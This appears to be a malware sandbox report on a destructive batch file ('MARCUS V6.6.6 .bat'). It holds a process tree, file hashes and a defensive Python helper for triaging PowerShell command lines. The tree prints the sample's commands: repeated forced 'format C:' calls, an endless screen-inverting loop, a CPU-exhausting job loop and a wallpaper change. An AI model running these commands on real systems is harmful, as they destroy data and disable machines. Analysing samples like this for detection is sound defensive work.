C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:83⤵PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:83⤵PID:3332
-
-

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe  (PID 1480)
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Windows\system32\cmd.exe  (PID 2836)
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (PID 456)
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Windows\System32\cmd.exe  (PID 1604)
  cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"

  C:\Windows\system32\chcp.com  (PID 3516)
    cmdline: chcp 1250

  C:\Windows\system32\mode.com  (PID 4272)
    cmdline: mode 85,30

  C:\Windows\system32\wscript.exe  (PID 668)
    cmdline: wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4276)
    cmdline: powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\reg.exe  (PID 4676)
    cmdline: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
    - Sets desktop wallpaper using registry

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4680)
    cmdline: powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 1960)
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline"

C:\Windows\System32\cmd.exe  (PID 1356)
  cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"

  C:\Windows\system32\chcp.com  (PID 3948)
    cmdline: chcp 1250

  C:\Windows\system32\mode.com  (PID 952)
    cmdline: mode 85,30

  C:\Windows\system32\cmd.exe  (PID 1516)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 712)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4004)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3428)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5532)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3700)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4196)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4960)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 188)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2428)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4412)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 5564)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5828)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2864)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4984)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 5952)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2300)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 1848)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3556)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 720)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2128)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3672)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 1164)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4988)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5796)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2776)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 764)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3496)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3696)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4756)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 1312)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4496)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4192)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2244)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 420)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4272)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 956)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2492)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3540)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 564)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 1300)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2324)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3452)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 1740)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5040)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 5844)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 544)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 5308)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2940)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 6052)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4832)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3952)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5736)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 2696)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3764)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4432)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 4676)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 1600)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5908)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 6084)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2620)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3724)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2140)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 668)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2892)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4448)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5868)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 1972)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 5700)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 5004)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3972)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 3948)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 3628)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 1188)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\cmd.exe  (PID 2916)
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo y"

  C:\Windows\system32\format.com  (PID 4860)
    cmdline: format C: /fs:NULL /p:3 /q

  C:\Windows\system32\wscript.exe  (PID 2364)
    cmdline: wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 712)
    cmdline: powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\reg.exe  (PID 5852)
    cmdline: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
    - Sets desktop wallpaper using registry

  C:\Windows\system32\wscript.exe  (PID 4772)
    cmdline: wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 784)
    cmdline: powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\reg.exe  (PID 5996)
    cmdline: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
    - Sets desktop wallpaper using registry

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (56 instances, each at tree depth 3, each launched with this identical command line)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Signatures per instance, PIDs in the order the report lists them:
- Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  PID:1704, 4324, 188, 5812, 5112, 4228, 5860, 2344, 6256, 6408
- Command and Scripting Interpreter: PowerShell; Suspicious use of AdjustPrivilegeToken
  PID:6552, 6684, 6820, 6956, 7084, 6248, 6564, 6940, 6536, 6528, 7280, 7416, 7544, 7672, 7804, 7940, 8072, 7256, 7656, 8032, 7908, 8236, 8372, 8496, 8632, 8760, 8896, 9032, 9168, 8012, 8756, 9140, 4580, 9272, 9408, 9540, 9680, 9808, 9936, 10068, 10200, 9508, 9908
- Command and Scripting Interpreter: PowerShell
  PID:9396, 10340, 10348
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo [ 100% " (depth 2)
PID:7720
-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4 (depth 1)
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:9392
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe" (depth 1)
PID:2068
-
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d (depth 1)
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2624
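The 56 powershell.exe entries above share one command line, `-Version 5.1 -s -NoLogo -NoProfile`. `-s` is the short form PowerShell accepts for `-ServerMode`, and this exact invocation is what powershell.exe spawns for its own out-of-process workers (background jobs started with Start-Job, for example). A worker receives the script it runs over its standard input, not on its command line, so the tree records the spawning pattern but not the code; that has to come from PowerShell script block logging (Event ID 4104) or from the sandbox's own hooks. The following Python is an added triage helper, not part of the report or of the sample it describes: it buckets command lines by where a PowerShell payload would live, flags a burst of identical server-mode workers, and decodes an `-EncodedCommand` argument where one is present. The SAMPLE records are transcribed from the tree above (only five of the 56 identical worker entries are reproduced), except for the last record, which is a constructed contrast case; the bucket names and the burst threshold are this example's own choices.

```python
"""Triage helper for a sandbox process tree: group identical command lines and
flag PowerShell server-mode workers, whose payload never appears on the command
line. Added example, not part of the sandbox report or of the sample it analyses."""
import base64
import re
from collections import Counter

# Records (pid, depth, command line) transcribed from the process tree above.
# Only five of the 56 identical powershell.exe entries are reproduced; the
# remaining 51 differ from these only by PID.
PS_WORKER = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
             r' -Version 5.1 -s -NoLogo -NoProfile')
SAMPLE = [
    (1704, 3, PS_WORKER),
    (4324, 3, PS_WORKER),
    (188, 3, PS_WORKER),
    (9396, 3, PS_WORKER),
    (10348, 3, PS_WORKER),
    (7720, 2, r'C:\Windows\system32\cmd.exe /S /D /c" echo [ 100% "'),
    (9392, 1, r'"C:\Windows\system32\taskmgr.exe" /4'),
    (2624, 1, r'"LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d'),
    # Constructed contrast case (not from the report): an invocation that does
    # carry its payload on the command line, as -EncodedCommand (UTF-16LE "IEX").
    (9999, 3, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
              r' -NoProfile -EncodedCommand SQBFAFgA'),
]

FLAG_RE = re.compile(r'(?<!\S)-([A-Za-z]+)')


def ps_flags(cmdline):
    """Lower-cased switch names found on a command line ('-Version' -> 'version')."""
    return {f.lower() for f in FLAG_RE.findall(cmdline)}


def classify(cmdline):
    """Bucket a command line by where a PowerShell payload would live.

    powershell.exe accepts unique prefixes of its switches, so prefix matching
    mirrors its parser: '-s' is -ServerMode (worker mode used by Start-Job and
    out-of-process runspaces; script arrives over stdin), '-e'/'-ec'/'-enc' are
    -EncodedCommand and '-c' is -Command (script is on argv)."""
    if 'powershell.exe' not in cmdline.lower():
        return 'other'
    flags = ps_flags(cmdline)
    if any('servermode'.startswith(f) for f in flags):
        return 'ps-servermode'
    if any(f == 'ec' or 'encodedcommand'.startswith(f) or 'command'.startswith(f)
           for f in flags):
        return 'ps-inline-payload'
    return 'ps-other'


def decode_encoded_command(cmdline):
    """Recover the script from an -EncodedCommand argument (base64 of UTF-16LE)."""
    m = re.search(r'(?i)(?<!\S)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)', cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode('utf-16-le')


def summarize(records):
    """Return (bucket -> count, command line -> count) for the records."""
    buckets = Counter(classify(cmd) for _, _, cmd in records)
    distinct = Counter(cmd for _, _, cmd in records)
    return buckets, distinct


def findings(records, burst=5):
    """Analyst-facing conclusions: a worker burst (threshold is this example's
    choice) and any inline payload that can be decoded straight from argv."""
    buckets, _ = summarize(records)
    out = []
    n = buckets.get('ps-servermode', 0)
    if n >= burst:
        out.append(f'{n} PowerShell server-mode workers with an identical command line: '
                   'Start-Job/out-of-process-runspace pattern; the script is not on argv, '
                   'collect Event ID 4104 (script block logging) for these PIDs')
    for _, _, cmd in records:
        if classify(cmd) == 'ps-inline-payload':
            script = decode_encoded_command(cmd)
            if script is not None:
                out.append(f'inline payload decoded: {script!r}')
    return out


if __name__ == '__main__':
    for line in findings(SAMPLE):
        print(line)
```

Run it and the worker burst is reported alongside the decoded constructed `IEX`; run it against the full 56-entry tree and the only change is the count. The point for detection engineering is that a process-creation rule on `powershell.exe -s` tells you a parent PowerShell is fanning out jobs, nothing more; the content has to be recovered from 4104 events or from the parent's own script.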
Network
MITRE ATT&CK Enterprise v16
Downloads
-
Filesize: 2KB
MD5: ed30ca9187bf5593affb3dc9276309a6
SHA1: c63757897a6c43a44102b221fe8dc36355e99359
SHA256: 81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA512: 1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize: 280B
MD5: 0524c92c95ae22d4f59e3a97b47744ff
SHA1: b5bfc1a1bafe619b75255161b0a295956a28cf9e
SHA256: 61e7d262c220c13fc9aa6bc6d35af2e94cb43bee7de3b90840cb7a905769676c
SHA512: 74cb6174ba92659c9011afd13b0460753bfe499183d577097251fa8dbfda9a71796dc80d3a00b9933b42d3d6dd386725439d485b96d90e9783dc2c1c6ba315a5
-
Filesize: 280B
MD5: 50682d36ea29dc25028cb8219fc8a699
SHA1: f986acb0971c6b7337f450510cab2cb6f74164e8
SHA256: da7fcfc287a041747fbcd486e0e8791a5fb30c64e345e73918d41cee1f655484
SHA512: 5e582708ff6a5e6fd56da0a1d5448fbde1588f704178a8347880357c8b29a113cb0660dc22ed2702ba34a7be7d7d7ac37451c16f473d03ce8273025e35d9bcc8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp
Filesize: 1B
MD5: 5058f1af8388633f609cadb75a75dc9d
SHA1: 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256: cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512: 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize: 331B
MD5: dd616b1ac33c823762bae6902222f878
SHA1: cff9f27788f0442abb44ebf03a2c5c935caf7439
SHA256: fbcf4df43de9eb727ed31ffa93c0fb0ccda804394e2090a3a982f67f8cc31994
SHA512: 63aaa9e6fad3270b997c0691d8acfc8595ca15b33a574a6773d5f53bb6b1c18d9b35bc4445c8f569b7e1c51be27f8c839be0f85601e3d3117553114d5a5bb4ea
-
Filesize: 44KB
MD5: 13b477494b9d13398def88761acf707d
SHA1: b8ed7fd5dbe57cf75ba818b68eaccc4487f3024f
SHA256: be46dd69fcf95cde897ff83ae92f388d52a4aec19c0056eee747b5984c4924ce
SHA512: ad897cce1b48c83b9472c5f71fb03b308cf6082b8d42a6ef4dbdeb7df6a3d801153d5154c004b776dd3d59abe1c8df40cf666ceafbb72bb59b74bcc442104652
-
Filesize: 520KB
MD5: 3984094cc81f436705429ed63ebbfa3b
SHA1: 59d9989298a826912387ccc6e6ce3f4d7e8d9a9f
SHA256: 46a8361584e71613d8a6a3f3e850458a09ce8fef4a35917fceb77d51ad80397b
SHA512: e184dfceeba8b91181f1157b21237a0d7841b5a0de594d1017e9a62d114d819501770dbe0a520401689bdf60e7023822000d84744a6f3d5328daee27241ae79f
-
Filesize: 1.0MB
MD5: 67c31d3cd30537e69a765495ee0374ae
SHA1: b4ab8e0c8632c8ee70d7feedc342e98c79017e6c
SHA256: 879525d0246352d78965eb76a9904cae571648f65973e9c62601bc2c46fdc426
SHA512: 30f386d835a14f19fd9e84b90f76b7cff74adf5f6311ccf1166afa399dc7f4e20708519a1aa44d957184af4ebcab6dcb5ee760324969ac2e105c80a2dba02481
-
Filesize: 8.0MB
MD5: e9122de20589855e9b8f3dd1f03fb6b2
SHA1: 309046468630758be927857fa4f7f1f05f8d265b
SHA256: c98798142aef34e3e7b3d0cb863a598cc20660bbeb3d8771f0c32529ccfb7cee
SHA512: 0145adb36d96b96cf734d6d71900c14def03a5925eede53c854899500a91f3dba342aadc741228f8d611fdf2c3759a83a176eeaa7c6d2aed5617f7f49a8c8724
-
Filesize: 5KB
MD5: f62195fefaa65c5acfcf944cf3b76108
SHA1: 6baed5a04e3419c9be4582b74a4480590e4a3ad6
SHA256: d048490e60db3268bd04d75c3c4f8434fea474150fc1e987ae4f6cfd140143ab
SHA512: 46e89e42f8c918354e652499d3acc542f1a53bfdda3b6622845b40ad4f7cc07b1a2ee1363b2bac4453a01f69802fd3b37b448c09780b244515a5f400b8aa5bda
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 4KB
MD5: 6961f0238adf896f44335ec3b85154cc
SHA1: cca4fae83a557d557a5d88b1867608ac0662547e
SHA256: 622edd9eca35effa8f8e859401b1e14762038eb704fe8b5647366973fccd55c1
SHA512: 95def2b8dc34b4ce6343b30df594eba0fec989b0434b7d873dfd026869fa8d37a70cad76750360704d8eaf94fde00d2378939e0fcf29227fdc806e21c86bbb23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57d4d4.TMP
Filesize: 4KB
MD5: a6ded319994831632738522e40f22561
SHA1: 1d28a0c4dc71fbea02d87f8678504dccd25aea99
SHA256: 6354905e6cf9a5559aa69ec9d939d38f071bc3ae7d25ba3d0ef5c374682eb4d8
SHA512: 636120a3ad1b53e64477e7dedf163a2b58636b8174520f2bbd79d4bd1547cd4ee9cc3d97075aaafa9ec7858f3bb574e1caca463fe383862a6805633292c57b46
-
Filesize: 2B
MD5: 99914b932bd37a50b983c5e7c90ae93b
SHA1: bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256: 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512: 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize: 20KB
MD5: d0eaa172f3bbf72652359b70b4ebf9f4
SHA1: b00788054f525e931158ac78f0ada17d6789d8f6
SHA256: 5fae474698a5c75799e4f9f6e4a7fab926372d177904dbc4e4c4af4f036fc807
SHA512: 259b06dde9049b471b5e6b068fdd581e1b5fa757fec4a600fb5c7c933abed4f95dd0c5b941fd0dac7a30414c968297036c7eac1e92dec840ac07a701034f3624
-
Filesize: 264KB
MD5: b016a2a37b83156a43dc509712c9468a
SHA1: a6ac6b50452acedffa2cb70936d4b6c19a1425a5
SHA256: b3ef033b660d0a1a9344193497e8920d4a831d46ecfe73344bb8bea07ef94e64
SHA512: 121467315ac8d3b9dbf3495105fd69cb9b1c9c5b08e8d50c5fb6311afbee9d15b1b51cbb1b9329c0a211e5c088e942f70e990c08ccc0adb28eab9585e3c06fb8
-
Filesize: 224KB
MD5: 3cf3cbfee9d8cff26a4c0eca5bcf3be9
SHA1: 90df1446ade1d5f937d04cce1ccc6e92392bd650
SHA256: 1f0281dca0fbbcc2466d26d6601e2e8d098bfb3a476aea61fd957a8a12630859
SHA512: 7654b0392ecc0ee7b2d3fa24d802b3a34139947ed6c746561cb0803ac9b6df9e6fecb2c0d18a0d5d3549921fe197663fb358537dea57fdf504b656622d675760
-
Filesize: 108KB
MD5: 06d55006c2dec078a94558b85ae01aef
SHA1: 6a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256: 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512: ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60
-
Filesize: 9KB
MD5: daa96fdb1342d7a49a350ca72f29e629
SHA1: f80628757e488eb00d3f550bca265d8c0b205d54
SHA256: b20f0ee910e6da19fc2dd893076715cb514bc4e0ab58a808df6141053cda96e7
SHA512: 164081123e8a085b7ac008b3aa1b79b411a4cf8f3554e27c9ac4ac7b2e82272d6e27d5fd80477d292ef92f75c5512724a4fd55fb6d93daec3b4530721cfc691b
-
Filesize: 14KB
MD5: 1cc0e3d523ed52009ec29842686d4e6e
SHA1: b79ae6892a271bc3ca6eea6ec5f5fbb223b49e46
SHA256: c3162f63e3975c7fc7a50ad1cd2e1de1771304b661b5134030ed30ede8396fb9
SHA512: 489cf0df9600abe52e72aefeadc7cb321ec9b76a609772d270a08a9bba05a6850e2733ce275a085d56861c90bb41c186c3ab40cbad09b8c0c48c83b53eade214
-
Filesize: 9KB
MD5: 3cafc2964fcc514fb3e921fa2428e927
